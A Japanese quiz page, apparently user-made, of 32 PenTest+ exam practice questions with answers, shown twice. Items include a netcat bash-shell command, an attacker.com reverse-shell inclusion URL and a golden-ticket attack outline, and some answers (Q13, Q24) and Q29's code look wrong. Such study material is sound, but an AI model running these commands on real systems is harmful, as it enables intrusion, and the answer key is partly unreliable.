PenTest+(8)

PenTest+(8)
32問 • 4年前
  • なおき
  • 通報

    問題一覧

  • 1

    Linuxからmetasploitを起動させているのはどれですか。

    msfconsole

  • 2

    digを使用してドメインコントローラーの情報を収集するコマンドラインの一部はどれですか。

    _kerberos._tcp._msdcs.example.com.

  • 3

    一連のIPアドレスのPTRを集めるのに使用するコマンドはどれですか。

    dig

  • 4

    IoTのセキュリティが弱い理由はどれですか。

    ハードウェアのスペック不足

  • 5

    コールバック接続の生成として最もふさわしいものはどれですか。

    nc -lp 443 -e /usr/bin/bash

  • 6

    Ticket-grantingチケットを使用して認証情報を取得するのはどれですか。

    Kerberoasting

  • 7

    クレデンシャルのブルートフォース攻撃を行うツールはどれですか。

    hashcat

  • 8

    パッシブな脆弱性検査をするにはどれが適切ですか。

    shodan

  • 9

    ペネトレーションテストのレポートにおいて、全体的なリスクのレベルを解説する場所はどこですか。

    エグゼクティブサマリー

  • 10

    次のような出力を得るためのnmapのオプションはどれですか。 not shown 96port close 88/tcp open kerberos-sec? 139/tpc open Netbios-ssn 389/tpc open ldap? 445/tcp open Microsoft-ds? MACアドレス 40-B0-34-FA-41-9F デバイスタイプ 汎用 実行中 Linux2.4.X OSCPE cpe:/o:Linux_kernel2.4.21 OS詳細 Linux2.4.21 ネットワーク距離 1ホップ

    -A

  • 11

    WiFiのMITMのツールはどれですか。

    karma

  • 12

    CEOに対してSMSを使ってサイトに接続させて情報を取ろうとするのはどれですか。

    スピアフィッシング

  • 13

    ICSが潜在的な脆弱性をかかえる理由はどれですか。

    セキュリティが不要なため

  • 14

    営業時間中に従業員がいてもいなくても物理的にアクセスするために攻撃者が行うことはどれですか。

    バッジクローニング

  • 15

    metasploitでインターネット外からローカルPCに入るために追加して行うコマンドはどれですか。

    use auxiliary/server/socks4a

  • 16

    ローカルのネットワークでARPを使ったMITMを行うツールとして適切なものはどれですか。

    ettercap

  • 17

    ログを調べると30分で2回同じバッジが使われていることがわかりました。発生しているのはどれですか。

    バッジクローニング

  • 18

    いくつかの大きいポートでWebサービスが公開されていることについてペネトレーションテスターから報告を受けました。システム管理者によるとアプリケーションは443番ポートのみ使用しているとのことでした。適切な対応はどれですか。

    不要なサービスを無効にする

  • 19

    OSINTでターゲット企業の従業員の情報を得る方法のうち最初に行うこととして適切なものはどれですか。

    SNSで調査する

  • 20

    一つの企業に対して、長い時間をかけて侵入し、情報の窃取を行うのはどれですか。

    APT

  • 21

    外部ネットワーク侵入テストの期間中にペネトレーションテスターの送信元IPアドレスをIPSのホワイトリストに追加する議論がなされました。その議論の論点として最も適切なものはどれですか。

    IPSの防御性能の有効性確認よりシステム全般の脆弱性の発見が大切である

  • 22

    ペネトレーションテストで情報収集することを表した用語として適切なものはどれですか。

    フットプリンティング

  • 23

    セキュリティ評価者は、顧客企業のそのネットワークおよびシステムの包括的なペネトレーションテストを完了しました。評価中に、テスターは、会社のイントラネット全体の給与WebアプリケーションでTLSに使用される暗号ライブラリの脆弱性を特定しました。ベンダーによるパッチはまだ提供されていませんが、数日以内にパッチが提供される予定です。影響のリスクを軽減するのはどれですか。

    ACLを実装して、アプリケーションへのアクセスを財務部門のみに制限し、脆弱性修正後、再度許可

  • 24

    WAFログの監視中に、セキュリティアナリストは次のURLに対する攻撃の成功を発見しました: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php このタイプの攻撃を防ぐため、どのような対応が考えられますか。

    URLリダイレクトをブロック

  • 25

    ソーシャルエンジニアリングを行うため、対象企業の従業員名を取得するには、どれを使用しますか。

    SNS

  • 26

    脆弱性スキャンで指摘を受けた脆弱性が、どのような領域の脆弱性なのかを確認するにはどれを使用しますか。

    CWE

  • 27

    Telnetを停止しているといってますが、Nmapで調べるとポート22クローズ、ポート23オープンという結果でした。この状況を説明しているのはどれですか。

    標準でないポートで動作させている

  • 28

    ケルベロス攻撃のシナリオは次のうちのどれですか。

    ドメイン管理者のアカウントでSMBexecを実行し、その後mimikatzでゴールデンチケットを作成し、その後チケットをパージしゴールデンチケットをロードしドメイン管理者のチケットを作成する。

  • 29

    次のpythonのプログラムを実行した時にprintの出力先はどこになりますか。 #!/usr/bin/python import socket as sock for p in range(1,1024): try: s = sock.socket(sock.AF_INET,sock.SOCK_STREAM) s.connect('127.0.0.1',p) print '%d:open' % (p) except: continue

    画面

  • 30

    調査結果を機密として取り扱う理由として、適切なのはどれですか。

    第三者からの攻撃を誘引しないようにするため

  • 31

    サーバーで使用しているオープンソースソフトウェアのCVEを検索したところ、CVSSv3において7.0と評価されていました。この評価値の深刻度はどれですか。

    重要な脆弱性

  • 32

    オフィスビル内のカフェなどで画面を盗み見ることで情報を収集するのはどれですか。

    ショルダーサーフィン

  • PenTest+(6)

    PenTest+(6)

    なおき · 29問 · 4年前

    PenTest+(6)

    PenTest+(6)

    29問 • 4年前
    なおき

    AZ-104(5)

    AZ-104(5)

    なおき · 24問 · 3年前

    AZ-104(5)

    AZ-104(5)

    24問 • 3年前
    なおき

    AZ-104(3)

    AZ-104(3)

    なおき · 26問 · 3年前

    AZ-104(3)

    AZ-104(3)

    26問 • 3年前
    なおき

    CIS-ITSM-2

    CIS-ITSM-2

    なおき · 42問 · 5年前

    CIS-ITSM-2

    CIS-ITSM-2

    42問 • 5年前
    なおき

    AZ-104(10)

    AZ-104(10)

    なおき · 23問 · 3年前

    AZ-104(10)

    AZ-104(10)

    23問 • 3年前
    なおき

    AZ-104(1)

    AZ-104(1)

    なおき · 20問 · 3年前

    AZ-104(1)

    AZ-104(1)

    20問 • 3年前
    なおき

    CIS-ITSM-12

    CIS-ITSM-12

    なおき · 46問 · 4年前

    CIS-ITSM-12

    CIS-ITSM-12

    46問 • 4年前
    なおき

    AZ-104(8)

    AZ-104(8)

    なおき · 19問 · 3年前

    AZ-104(8)

    AZ-104(8)

    19問 • 3年前
    なおき

    CBAS

    CBAS

    なおき · 19問 · 3年前

    CBAS

    CBAS

    19問 • 3年前
    なおき

    AZ-104(7)

    AZ-104(7)

    なおき · 20問 · 3年前

    AZ-104(7)

    AZ-104(7)

    20問 • 3年前
    なおき

    AZ-104(6)

    AZ-104(6)

    なおき · 25問 · 3年前

    AZ-104(6)

    AZ-104(6)

    25問 • 3年前
    なおき

    CIS-ITSM-13

    CIS-ITSM-13

    なおき · 21問 · 4年前

    CIS-ITSM-13

    CIS-ITSM-13

    21問 • 4年前
    なおき

    CIS-ITSM-1

    CIS-ITSM-1

    なおき · 37問 · 5年前

    CIS-ITSM-1

    CIS-ITSM-1

    37問 • 5年前
    なおき

    PenTest+(7)

    PenTest+(7)

    なおき · 30問 · 4年前

    PenTest+(7)

    PenTest+(7)

    30問 • 4年前
    なおき

    AZ-104(9)

    AZ-104(9)

    なおき · 25問 · 3年前

    AZ-104(9)

    AZ-104(9)

    25問 • 3年前
    なおき

    AZ-104(2)

    AZ-104(2)

    なおき · 23問 · 3年前

    AZ-104(2)

    AZ-104(2)

    23問 • 3年前
    なおき

    AZ-104(4)

    AZ-104(4)

    なおき · 23問 · 3年前

    AZ-104(4)

    AZ-104(4)

    23問 • 3年前
    なおき

    Data-01

    Data-01

    なおき · 36問 · 2年前

    Data-01

    Data-01

    36問 • 2年前
    なおき

    Data-02

    Data-02

    なおき · 52問 · 2年前

    Data-02

    Data-02

    52問 • 2年前
    なおき

    Data-03

    Data-03

    なおき · 19問 · 2年前

    Data-03

    Data-03

    19問 • 2年前
    なおき

    Data-04

    Data-04

    なおき · 50問 · 2年前

    Data-04

    Data-04

    50問 • 2年前
    なおき

    Data-05

    Data-05

    なおき · 39問 · 2年前

    Data-05

    Data-05

    39問 • 2年前
    なおき

    DATA-001

    DATA-001

    なおき · 30問 · 2年前

    DATA-001

    DATA-001

    30問 • 2年前
    なおき

    DATA-002

    DATA-002

    なおき · 49問 · 2年前

    DATA-002

    DATA-002

    49問 • 2年前
    なおき

    DATA-003

    DATA-003

    なおき · 37問 · 2年前

    DATA-003

    DATA-003

    37問 • 2年前
    なおき

    AZ104(1)

    AZ104(1)

    なおき · 4回閲覧 · 54問 · 2年前

    AZ104(1)

    AZ104(1)

    4回閲覧 • 54問 • 2年前
    なおき

    comptia project+_001

    comptia project+_001

    なおき · 10問 · 2年前

    comptia project+_001

    comptia project+_001

    10問 • 2年前
    なおき

    フレーズ

    フレーズ

    なおき · 21問 · 7ヶ月前

    フレーズ

    フレーズ

    21問 • 7ヶ月前
    なおき

    問題一覧

  • 1

    Linuxからmetasploitを起動させているのはどれですか。

    msfconsole

  • 2

    digを使用してドメインコントローラーの情報を収集するコマンドラインの一部はどれですか。

    _kerberos._tcp._msdcs.example.com.

  • 3

    一連のIPアドレスのPTRを集めるのに使用するコマンドはどれですか。

    dig

  • 4

    IoTのセキュリティが弱い理由はどれですか。

    ハードウェアのスペック不足

  • 5

    コールバック接続の生成として最もふさわしいものはどれですか。

    nc -lp 443 -e /usr/bin/bash

  • 6

    Ticket-grantingチケットを使用して認証情報を取得するのはどれですか。

    Kerberoasting

  • 7

    クレデンシャルのブルートフォース攻撃を行うツールはどれですか。

    hashcat

  • 8

    パッシブな脆弱性検査をするにはどれが適切ですか。

    shodan

  • 9

    ペネトレーションテストのレポートにおいて、全体的なリスクのレベルを解説する場所はどこですか。

    エグゼクティブサマリー

  • 10

    次のような出力を得るためのnmapのオプションはどれですか。 not shown 96port close 88/tcp open kerberos-sec? 139/tpc open Netbios-ssn 389/tpc open ldap? 445/tcp open Microsoft-ds? MACアドレス 40-B0-34-FA-41-9F デバイスタイプ 汎用 実行中 Linux2.4.X OSCPE cpe:/o:Linux_kernel2.4.21 OS詳細 Linux2.4.21 ネットワーク距離 1ホップ

    -A

  • 11

    WiFiのMITMのツールはどれですか。

    karma

  • 12

    CEOに対してSMSを使ってサイトに接続させて情報を取ろうとするのはどれですか。

    スピアフィッシング

  • 13

    ICSが潜在的な脆弱性をかかえる理由はどれですか。

    セキュリティが不要なため

  • 14

    営業時間中に従業員がいてもいなくても物理的にアクセスするために攻撃者が行うことはどれですか。

    バッジクローニング

  • 15

    metasploitでインターネット外からローカルPCに入るために追加して行うコマンドはどれですか。

    use auxiliary/server/socks4a

  • 16

    ローカルのネットワークでARPを使ったMITMを行うツールとして適切なものはどれですか。

    ettercap

  • 17

    ログを調べると30分で2回同じバッジが使われていることがわかりました。発生しているのはどれですか。

    バッジクローニング

  • 18

    いくつかの大きいポートでWebサービスが公開されていることについてペネトレーションテスターから報告を受けました。システム管理者によるとアプリケーションは443番ポートのみ使用しているとのことでした。適切な対応はどれですか。

    不要なサービスを無効にする

  • 19

    OSINTでターゲット企業の従業員の情報を得る方法のうち最初に行うこととして適切なものはどれですか。

    SNSで調査する

  • 20

    一つの企業に対して、長い時間をかけて侵入し、情報の窃取を行うのはどれですか。

    APT

  • 21

    外部ネットワーク侵入テストの期間中にペネトレーションテスターの送信元IPアドレスをIPSのホワイトリストに追加する議論がなされました。その議論の論点として最も適切なものはどれですか。

    IPSの防御性能の有効性確認よりシステム全般の脆弱性の発見が大切である

  • 22

    ペネトレーションテストで情報収集することを表した用語として適切なものはどれですか。

    フットプリンティング

  • 23

    セキュリティ評価者は、顧客企業のそのネットワークおよびシステムの包括的なペネトレーションテストを完了しました。評価中に、テスターは、会社のイントラネット全体の給与WebアプリケーションでTLSに使用される暗号ライブラリの脆弱性を特定しました。ベンダーによるパッチはまだ提供されていませんが、数日以内にパッチが提供される予定です。影響のリスクを軽減するのはどれですか。

    ACLを実装して、アプリケーションへのアクセスを財務部門のみに制限し、脆弱性修正後、再度許可

  • 24

    WAFログの監視中に、セキュリティアナリストは次のURLに対する攻撃の成功を発見しました: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php このタイプの攻撃を防ぐため、どのような対応が考えられますか。

    URLリダイレクトをブロック

  • 25

    ソーシャルエンジニアリングを行うため、対象企業の従業員名を取得するには、どれを使用しますか。

    SNS

  • 26

    脆弱性スキャンで指摘を受けた脆弱性が、どのような領域の脆弱性なのかを確認するにはどれを使用しますか。

    CWE

  • 27

    Telnetを停止しているといってますが、Nmapで調べるとポート22クローズ、ポート23オープンという結果でした。この状況を説明しているのはどれですか。

    標準でないポートで動作させている

  • 28

    ケルベロス攻撃のシナリオは次のうちのどれですか。

    ドメイン管理者のアカウントでSMBexecを実行し、その後mimikatzでゴールデンチケットを作成し、その後チケットをパージしゴールデンチケットをロードしドメイン管理者のチケットを作成する。

  • 29

    次のpythonのプログラムを実行した時にprintの出力先はどこになりますか。 #!/usr/bin/python import socket as sock for p in range(1,1024): try: s = sock.socket(sock.AF_INET,sock.SOCK_STREAM) s.connect('127.0.0.1',p) print '%d:open' % (p) except: continue

    画面

  • 30

    調査結果を機密として取り扱う理由として、適切なのはどれですか。

    第三者からの攻撃を誘引しないようにするため

  • 31

    サーバーで使用しているオープンソースソフトウェアのCVEを検索したところ、CVSSv3において7.0と評価されていました。この評価値の深刻度はどれですか。

    重要な脆弱性

  • 32

    オフィスビル内のカフェなどで画面を盗み見ることで情報を収集するのはどれですか。

    ショルダーサーフィン